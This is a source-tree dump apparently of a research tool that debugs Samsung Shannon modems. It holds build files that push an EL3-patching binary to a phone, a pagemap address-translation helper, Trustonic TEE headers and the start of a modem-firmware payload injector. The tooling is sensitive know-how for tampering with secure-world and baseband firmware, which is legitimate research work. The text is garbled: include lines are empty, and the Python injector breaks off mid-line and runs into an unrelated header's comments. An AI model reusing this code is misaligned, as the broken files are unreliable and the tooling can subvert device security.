├── README.md ├── el3_patcher ├── README.md ├── lib │ └── libMcClient.so ├── ta │ └── s7 │ │ ├── ffffffffd00000000000000000000004.tlbin │ │ └── fffffffff0000000000000000000001b.tlbin ├── include │ ├── dbg.h │ ├── tools.h │ ├── mcSuid.h │ ├── mcRootid.h │ ├── mcVersionInfo.h │ ├── mcSpid.h │ ├── mcDriverId.h │ ├── mcUuid.h │ ├── mcSo.h │ ├── mcContainer.h │ ├── mcVersionHelper.h │ ├── mcLoadFormat.h │ └── MobiCoreDriverApi.h ├── Makefile └── src │ ├── tools.c │ └── patch_el3.c └── modem_injector ├── README.md └── patch_modem.py /README.md: -------------------------------------------------------------------------------- 1 | # shannon-dbg 2 | -------------------------------------------------------------------------------- /el3_patcher/README.md: -------------------------------------------------------------------------------- 1 | ANDROID_NDK_ROOT=/home/$USER/android/android-ndk-r21 make install 2 | -------------------------------------------------------------------------------- /modem_injector/README.md: -------------------------------------------------------------------------------- 1 | python2 patch_modem.py ../debugger/bin/payload.bin modem.bin modem_patched.bin 2 | -------------------------------------------------------------------------------- /el3_patcher/lib/libMcClient.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/synacktiv/shannon-dbg/HEAD/el3_patcher/lib/libMcClient.so -------------------------------------------------------------------------------- /el3_patcher/ta/s7/ffffffffd00000000000000000000004.tlbin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/synacktiv/shannon-dbg/HEAD/el3_patcher/ta/s7/ffffffffd00000000000000000000004.tlbin -------------------------------------------------------------------------------- /el3_patcher/ta/s7/fffffffff0000000000000000000001b.tlbin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/synacktiv/shannon-dbg/HEAD/el3_patcher/ta/s7/fffffffff0000000000000000000001b.tlbin -------------------------------------------------------------------------------- /el3_patcher/include/dbg.h: -------------------------------------------------------------------------------- 1 | #ifndef DBG_H 2 | #define DBG_H 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #define err(f_, ...) \ 10 | printf("[\033[31;1m!\033[0m] "); \ 11 | printf(f_, ##__VA_ARGS__); \ 12 | fflush(stdout); 13 | #define ok(f_, ...) \ 14 | printf("[\033[32;1m+\033[0m] "); \ 15 | printf(f_, ##__VA_ARGS__); \ 16 | fflush(stdout); 17 | #define info(f_, ...) \ 18 | printf("[\033[34;1m-\033[0m] "); \ 19 | printf(f_, ##__VA_ARGS__); \ 20 | fflush(stdout); 21 | #define warn(f_, ...) \ 22 | printf("[\033[33;1mw\033[0m] "); \ 23 | printf(f_, ##__VA_ARGS__); \ 24 | fflush(stdout); 25 | 26 | 27 | #endif -------------------------------------------------------------------------------- /el3_patcher/Makefile: -------------------------------------------------------------------------------- 1 | ifeq ($(ANDROID_NDK_ROOT),) 2 | $(error Error : Set the env variable 'ANDROID_NDK_ROOT' with the path of the Android NDK (version 20)) 3 | endif 4 | 5 | CC := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android27-clang 6 | LINKER := /system/bin/linker64 7 | 8 | DEBUG := -g 9 | 10 | CFLAGS := $(DEBUG) -fno-short-enums -fPIE -pie -I./include 11 | CFLAGS += -Wl,-rpath-link=,-dynamic-linker=$(LINKER) -L./lib -fuse-ld=gold -Wall -Wextra 12 | 13 | all: el3_patch 14 | 15 | el3_patch: 16 | xxd -i ta/s7/fffffffff0000000000000000000001b.tlbin > include/ta_s7_sem.h 17 | xxd -i ta/s7/ffffffffd00000000000000000000004.tlbin > include/ta_s7_validator.h 18 | $(CC) src/patch_el3.c src/tools.c -o bin/patch_el3 $(CFLAGS) -lMcClient 19 | 20 | install: all 21 | adb push bin/patch_el3 /data/local/tmp 22 | -------------------------------------------------------------------------------- /el3_patcher/include/tools.h: -------------------------------------------------------------------------------- 1 | #ifndef TOOLS_H 2 | #define TOOLS_H 3 | 4 | #define _GNU_SOURCE 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include "dbg.h" 26 | 27 | #define PAGE_SIZE_EXYNOS 0x00001000 28 | #define PAGE_MASK_EXYNOS (~(PAGE_SIZE_EXYNOS - 1)) 29 | #define PAGE_ALIGN(addr) (((addr) + PAGE_SIZE_EXYNOS - 1) & PAGE_MASK_EXYNOS) 30 | #define PAGE_ADDR(addr) (addr & PAGE_MASK_EXYNOS) 31 | 32 | typedef struct 33 | { 34 | uint64_t pfn : 54; 35 | unsigned int soft_dirty : 1; 36 | unsigned int file_page : 1; 37 | unsigned int swapped : 1; 38 | unsigned int present : 1; 39 | } PagemapEntry; 40 | 41 | uint8_t *mmap_shared(uint32_t shareLen, uintptr_t *phys_addr); 42 | 43 | #endif -------------------------------------------------------------------------------- /el3_patcher/src/tools.c: -------------------------------------------------------------------------------- 1 | #include "tools.h" 2 | 3 | int pagemap_get_entry(PagemapEntry *entry, int pagemap_fd, uintptr_t vaddr) 4 | { 5 | size_t nread; 6 | ssize_t ret; 7 | uint64_t data; 8 | 9 | nread = 0; 10 | while (nread < sizeof(data)) 11 | { 12 | ret = pread(pagemap_fd, &data, sizeof(data), 13 | (vaddr / sysconf(_SC_PAGE_SIZE)) * sizeof(data) + nread); 14 | nread += ret; 15 | if (ret <= 0) 16 | { 17 | return 1; 18 | } 19 | } 20 | entry->pfn = data & (((uint64_t)1 << 54) - 1); 21 | entry->soft_dirty = (data >> 54) & 1; 22 | entry->file_page = (data >> 61) & 1; 23 | entry->swapped = (data >> 62) & 1; 24 | entry->present = (data >> 63) & 1; 25 | return 0; 26 | } 27 | 28 | int virt_to_phys_user(uintptr_t *paddr, uintptr_t vaddr) 29 | { 30 | char pagemap_file[BUFSIZ]; 31 | int pagemap_fd; 32 | 33 | snprintf(pagemap_file, sizeof(pagemap_file), "/proc/self/pagemap"); 34 | pagemap_fd = open(pagemap_file, O_RDONLY); 35 | if (pagemap_fd < 0) 36 | { 37 | return 1; 38 | } 39 | PagemapEntry entry; 40 | if (pagemap_get_entry(&entry, pagemap_fd, vaddr)) 41 | { 42 | return 1; 43 | } 44 | close(pagemap_fd); 45 | *paddr = (entry.pfn * sysconf(_SC_PAGE_SIZE)) + (vaddr % sysconf(_SC_PAGE_SIZE)); 46 | return 0; 47 | } 48 | 49 | 50 | uint8_t *mmap_shared(uint32_t shareLen, uintptr_t *phys_addr) 51 | { 52 | while (1) 53 | { 54 | uint8_t *share = mmap(NULL, 55 | PAGE_ALIGN(shareLen), 56 | PROT_READ | PROT_WRITE, 57 | MAP_ANONYMOUS | MAP_PRIVATE, 58 | 0, 59 | 0); 60 | memset(share, 0x41, shareLen); 61 | 62 | uintptr_t share_phys; 63 | if (virt_to_phys_user(&share_phys, (uintptr_t)share)) 64 | { 65 | return NULL; 66 | } 67 | if (share_phys < 0xFFFFFFFF) 68 | { 69 | *phys_addr = share_phys; 70 | return share; 71 | } 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /el3_patcher/include/mcSuid.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2013-2015 TRUSTONIC LIMITED 3 | * All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions are met: 7 | * 8 | * 1. Redistributions of source code must retain the above copyright notice, 9 | * this list of conditions and the following disclaimer. 10 | * 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * 3. Neither the name of the TRUSTONIC LIMITED nor the names of its 16 | * contributors may be used to endorse or promote products derived from 17 | * this software without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 20 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 21 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 22 | * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR 23 | * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 24 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 25 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 26 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 27 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 28 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 29 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | */ 31 | 32 | #ifndef MC_SUID_H_ 33 | #define MC_SUID_H_ 34 | 35 | /** Length of SUID. */ 36 | #define MC_SUID_LEN 16 37 | 38 | /** Platform specific device identifier (serial number of the chip). */ 39 | typedef struct { 40 | uint8_t data[MC_SUID_LEN - sizeof(uint32_t)]; 41 | } suidData_t; 42 | 43 | /** Soc unique identifier type. */ 44 | typedef struct { 45 | uint32_t sipId; /**< Silicon Provider ID to be set during build. */ 46 | suidData_t suidData; 47 | } mcSuid_t; 48 | 49 | #endif // MC_SUID_H_ 50 | 51 | -------------------------------------------------------------------------------- /el3_patcher/include/mcRootid.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2013-2015 TRUSTONIC LIMITED 3 | * All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions are met: 7 | * 8 | * 1. Redistributions of source code must retain the above copyright notice, 9 | * this list of conditions and the following disclaimer. 10 | * 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * 3. Neither the name of the TRUSTONIC LIMITED nor the names of its 16 | * contributors may be used to endorse or promote products derived from 17 | * this software without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 20 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 21 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 22 | * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR 23 | * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 24 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 25 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 26 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 27 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 28 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 29 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | */ 31 | 32 | #ifndef MC_ROOTID_H_ 33 | #define MC_ROOTID_H_ 34 | 35 | #ifdef WIN32 36 | #define _UNUSED 37 | #else 38 | #define _UNUSED __attribute__((unused)) 39 | #endif 40 | 41 | /** Root Identifier type. */ 42 | typedef uint32_t mcRootid_t; 43 | 44 | /** Reserved root id value 1. */ 45 | static _UNUSED const mcRootid_t MC_ROOTID_RESERVED1 = 0; 46 | 47 | /** Reserved root id value 2. */ 48 | static _UNUSED const mcRootid_t MC_ROOTID_RESERVED2 = 0xFFFFFFFF; 49 | 50 | /** Root id for system applications. */ 51 | static _UNUSED const mcRootid_t MC_ROOTID_SYSTEM = 0xFFFFFFFE; 52 | 53 | /** Yet another test ROOT ID */ 54 | static _UNUSED const mcRootid_t MC_ROOTID_RESERVED3 = 0xFFFFFFFD; 55 | 56 | /** GP TAs - used in the Trusted storage */ 57 | static _UNUSED const mcRootid_t MC_ROOTID_GP = 0xFFFFFFFC; 58 | 59 | /** RTM's Root ID */ 60 | static _UNUSED const mcRootid_t MC_ROOTID_RTM = 0xFFFFFFFB; 61 | 62 | #endif // MC_ROOTID_H_ 63 | 64 | -------------------------------------------------------------------------------- /el3_patcher/include/mcVersionInfo.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2013-2015 TRUSTONIC LIMITED 3 | * All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions are met: 7 | * 8 | * 1. Redistributions of source code must retain the above copyright notice, 9 | * this list of conditions and the following disclaimer. 10 | * 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * 3. Neither the name of the TRUSTONIC LIMITED nor the names of its 16 | * contributors may be used to endorse or promote products derived from 17 | * this software without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 20 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 21 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 22 | * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR 23 | * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 24 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 25 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 26 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 27 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 28 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 29 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | */ 31 | #ifndef MCVERSIONINFO_H_ 32 | #define MCVERSIONINFO_H_ 33 | 34 | /** Length of MobiCore product ID string. */ 35 | #define MC_PRODUCT_ID_LEN 64 36 | 37 | /** Global MobiCore Version Information. 38 | */ 39 | typedef struct { 40 | char productId[MC_PRODUCT_ID_LEN]; /** < Product ID of Mobicore; zero-terminated */ 41 | uint32_t versionMci; /** < Version of Mobicore Control Interface */ 42 | uint32_t versionSo; /** < Version of Secure Objects */ 43 | uint32_t versionMclf; /** < Version of MobiCore Load Format */ 44 | uint32_t versionContainer; /** < Version of MobiCore Container Format */ 45 | uint32_t versionMcConfig; /** < Version of MobiCore Configuration Block Format */ 46 | uint32_t versionTlApi; /** < Version of MobiCore Trustlet API Implementation */ 47 | uint32_t versionDrApi; /** < Version of MobiCore Driver API Implementation */ 48 | uint32_t versionCmp; /** < Version of Content Management Protocol */ 49 | } mcVersionInfo_t; 50 | 51 | #endif /** MCVERSIONINFO_H_ */ 52 | -------------------------------------------------------------------------------- /el3_patcher/include/mcSpid.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2013-2015 TRUSTONIC LIMITED 3 | * All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions are met: 7 | * 8 | * 1. Redistributions of source code must retain the above copyright notice, 9 | * this list of conditions and the following disclaimer. 10 | * 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * 3. Neither the name of the TRUSTONIC LIMITED nor the names of its 16 | * contributors may be used to endorse or promote products derived from 17 | * this software without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 20 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 21 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 22 | * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR 23 | * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 24 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 25 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 26 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 27 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 28 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 29 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | */ 31 | 32 | #ifndef MC_SPID_H_ 33 | #define MC_SPID_H_ 34 | 35 | #ifdef WIN32 36 | #define _UNUSED 37 | #else 38 | #define _UNUSED __attribute__((unused)) 39 | #endif 40 | 41 | /** Service provider Identifier type. */ 42 | typedef uint32_t mcSpid_t; 43 | 44 | /** SPID value used as free marker in root containers. */ 45 | static _UNUSED const mcSpid_t MC_SPID_FREE = 0xFFFFFFFF; 46 | 47 | /** Reserved SPID value. */ 48 | static _UNUSED const mcSpid_t MC_SPID_RESERVED = 0; 49 | 50 | /** SPID for system applications. */ 51 | static _UNUSED const mcSpid_t MC_SPID_SYSTEM = 0xFFFFFFFE; 52 | 53 | /** SPID reserved for tests only */ 54 | static _UNUSED const mcSpid_t MC_SPID_RESERVED_TEST = 0xFFFFFFFD; 55 | static _UNUSED const mcSpid_t MC_SPID_TRUSTONIC_TEST = 0x4; 56 | 57 | /** SPID reserved for OTA development */ 58 | static _UNUSED const mcSpid_t MC_SPID_TRUSTONIC_OTA = 0x2A; 59 | 60 | /** GP TAs - stored in the trusted storage. They all share the same */ 61 | static _UNUSED const mcSpid_t MC_SPID_GP = 0xFFFFFFFC; 62 | 63 | /** RTM's SPID */ 64 | static _UNUSED const mcSpid_t MC_SPID_RTM = 0xFFFFFFFB; 65 | 66 | #endif // MC_SPID_H_ 67 | 68 | -------------------------------------------------------------------------------- /el3_patcher/include/mcDriverId.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2013-2015 TRUSTONIC LIMITED 3 | * All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions are met: 7 | * 8 | * 1. Redistributions of source code must retain the above copyright notice, 9 | * this list of conditions and the following disclaimer. 10 | * 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * 3. Neither the name of the TRUSTONIC LIMITED nor the names of its 16 | * contributors may be used to endorse or promote products derived from 17 | * this software without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 20 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 21 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 22 | * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR 23 | * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 24 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 25 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 26 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 27 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 28 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 29 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | */ 31 | 32 | #ifndef RTMDRVID_H_ 33 | #define RTMDRVID_H_ 34 | 35 | #define MC_DRV_VENDOR_ID_SHIFT (16) 36 | #define MC_DRV_VENDOR_ID_MASK (0xFFFF << MC_DRV_VENDOR_ID_SHIFT) 37 | #define MC_DRV_NUMBER_MASK (0x0000FFFF) 38 | 39 | /** MobiCore vendor IDs. */ 40 | typedef enum { 41 | MC_DRV_VENDOR_ID_GD = 0 << MC_DRV_VENDOR_ID_SHIFT, 42 | } mcDrvVendorId_t; 43 | 44 | /** MobiCore GD driver numbers. */ 45 | typedef enum { 46 | MC_DRV_NUMBER_INVALID = 0, 47 | MC_DRV_NUMBER_CRYPTO = 1, 48 | /** Last GD driver number reserved for pre-installed drivers. 49 | * GD driver numbers up to this constant may not be used for loadable drivers. */ 50 | MC_DRV_NUMBER_LAST_PRE_INSTALLED = 100, 51 | TB_DRV_NUMBER_TUI = 0x101, 52 | TB_DRV_NUMBER_TPLAY = 0x600, 53 | } mcDrvNumber_t; 54 | 55 | /** MobiCore driver IDs for Trustlets. */ 56 | typedef enum { 57 | MC_DRV_ID_INVALID = MC_DRV_VENDOR_ID_GD | MC_DRV_NUMBER_INVALID, 58 | MC_DRV_ID_CRYPTO = MC_DRV_VENDOR_ID_GD | MC_DRV_NUMBER_CRYPTO, 59 | /** Last GD driver ID reserved for pre-installed drivers. 60 | * GD driver IDs up to this constant may not be used for loadable drivers. */ 61 | MC_DRV_ID_LAST_PRE_INSTALLED = MC_DRV_VENDOR_ID_GD | MC_DRV_NUMBER_LAST_PRE_INSTALLED, 62 | TB_DRV_ID_TUI = MC_DRV_VENDOR_ID_GD | TB_DRV_NUMBER_TUI, 63 | TB_DRV_ID_TPLAY = MC_DRV_VENDOR_ID_GD | TB_DRV_NUMBER_TPLAY, 64 | } mcDriverId_t; 65 | 66 | #endif /* RTMDRVID_H_ */ 67 | -------------------------------------------------------------------------------- /el3_patcher/include/mcUuid.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2013-2015 TRUSTONIC LIMITED 3 | * All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions are met: 7 | * 8 | * 1. Redistributions of source code must retain the above copyright notice, 9 | * this list of conditions and the following disclaimer. 10 | * 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * 3. Neither the name of the TRUSTONIC LIMITED nor the names of its 16 | * contributors may be used to endorse or promote products derived from 17 | * this software without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 20 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 21 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 22 | * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR 23 | * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 24 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 25 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 26 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 27 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 28 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 29 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | */ 31 | 32 | #ifndef MC_UUID_H_ 33 | #define MC_UUID_H_ 34 | 35 | #ifdef WIN32 36 | #define _UNUSED 37 | #else 38 | #define _UNUSED __attribute__((unused)) 39 | #endif 40 | 41 | #define UUID_TYPE 42 | 43 | #define UUID_LENGTH 16 44 | /** Universally Unique Identifier (UUID) according to ISO/IEC 11578. */ 45 | typedef struct { 46 | uint8_t value[UUID_LENGTH]; /**< Value of the UUID. */ 47 | } mcUuid_t, *mcUuid_ptr; 48 | 49 | /** UUID value used as free marker in service provider containers. */ 50 | #define MC_UUID_FREE_DEFINE \ 51 | { 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, \ 52 | 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF } 53 | 54 | static _UNUSED const mcUuid_t MC_UUID_FREE = { 55 | MC_UUID_FREE_DEFINE 56 | }; 57 | 58 | /** Reserved UUID. */ 59 | #define MC_UUID_RESERVED_DEFINE \ 60 | { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \ 61 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 } 62 | 63 | static _UNUSED const mcUuid_t MC_UUID_RESERVED = { 64 | MC_UUID_RESERVED_DEFINE 65 | }; 66 | 67 | /** UUID for system applications. */ 68 | #define MC_UUID_SYSTEM_DEFINE \ 69 | { 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, \ 70 | 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFE } 71 | 72 | static _UNUSED const mcUuid_t MC_UUID_SYSTEM = { 73 | MC_UUID_SYSTEM_DEFINE 74 | }; 75 | 76 | #define MC_UUID_RTM_DEFINE \ 77 | { 0x12, 0x34, 0x12, 0x34, 0x12, 0x34, 0x12, 0x34, \ 78 | 0x12, 0x34, 0x12, 0x34, 0x12, 0x34, 0x12, 0x34 } 79 | 80 | static _UNUSED const mcUuid_t MC_UUID_RTM = { 81 | MC_UUID_RTM_DEFINE 82 | }; 83 | 84 | /** 85 | * TODO: Replace with v5 UUID (milestone #3) 86 | */ 87 | #define LTA_UUID_DEFINE \ 88 | { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \ 89 | 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11} 90 | 91 | #endif // MC_UUID_H_ 92 | 93 | -------------------------------------------------------------------------------- /modem_injector/patch_modem.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # TODO: use python3 3 | # coding: utf8 4 | from struct import unpack, pack 5 | import zlib 6 | import sys 7 | 8 | def u32(data): 9 | return unpack(" 109 | * 110 | * 111 | * +--------+------------------+------------------+--------+--------+ 112 | * | Header | plain-data | encrypted-data | hash | random | 113 | * +--------+------------------+------------------+--------+--------+ 114 | * 115 | * /--------/---- plainLen ----/-- encryptedLen --/-- 32 --/-- 16 --/ 116 | * 117 | * /----------------- toBeHashedLen --------------/ 118 | * 119 | * /-- toBeEncryptedLen --/ 120 | * 121 | * /--------------------------- totalSoSize ------------------------/ 122 | * 123 | * 124 | * 125 | */ 126 | 127 | /** Secure object header v2.1. 128 | * A secure object header introduces a secure object. 129 | * Layout of a secure object: 130 | * 
131 |  * 
132 |  *
133 |  *     +--------+------------------+------------------+--------+--------+---------+
134 |  *     | Header |   plain-data     |  encrypted-data  |  hash  | random | padding |
135 |  *     +--------+------------------+------------------+--------+--------+---------+
136 |  *
137 |  *     /--------/---- plainLen ----/-- encryptedLen --/-- 24 --/--- 9 --/- 0..15 -/
138 |  *
139 |  *     /----------------- toBeHashedLen --------------/
140 |  *
141 |  *                                 /-- toBeEncryptedLen --/
142 |  *
143 |  *     /--------------------------- totalSoSize ----------------------------------/
144 |  *
145 |  * 
146 |  *
147 | */ 148 | 149 | /** Secure object header v2.0. 150 | * A secure object header introduces a secure object. 151 | * Layout of a secure object: 152 | * 
153 |  * 
154 |  *
155 |  *     +--------+------------------+------------------+--------+---------+
156 |  *     | Header |   plain-data     |  encrypted-data  |  hash  | padding |
157 |  *     +--------+------------------+------------------+--------+---------+
158 |  *
159 |  *     /--------/---- plainLen ----/-- encryptedLen --/-- 32 --/- 1..16 -/
160 |  *
161 |  *     /----------------- toBeHashedLen --------------/
162 |  *
163 |  *                                 /---------- toBeEncryptedLen ---------/
164 |  *
165 |  *     /--------------------------- totalSoSize -------------------------/
166 |  *
167 |  * 
168 |  *
169 | */ 170 | typedef struct { 171 | /** Type of secure object. */ 172 | uint32_t type; 173 | /** Secure object version. */ 174 | uint32_t version; 175 | /** Secure object context. */ 176 | mcSoContext_t context; 177 | /** Secure object lifetime. */ 178 | mcSoLifeTime_t lifetime; 179 | /** Producer Trustlet id. */ 180 | tlApiSpTrustletId_t producer; 181 | /** Length of unencrypted user data (after the header). */ 182 | uint32_t plainLen; 183 | /** Length of encrypted user data (after unencrypted data, excl. checksum 184 | * and excl. padding bytes). */ 185 | uint32_t encryptedLen; 186 | } mcSoHeader_t; 187 | 188 | /** Maximum size of the payload (plain length + encrypted length) of a secure object. */ 189 | #define MC_SO_PAYLOAD_MAX_SIZE 1000000 190 | 191 | /** Block size of encryption algorithm used for secure objects. */ 192 | #define MC_SO_ENCRYPT_BLOCK_SIZE 16 193 | 194 | /** Maximum number of ISO padding bytes. */ 195 | #define MC_SO_MAX_PADDING_SIZE (MC_SO_ENCRYPT_BLOCK_SIZE) 196 | 197 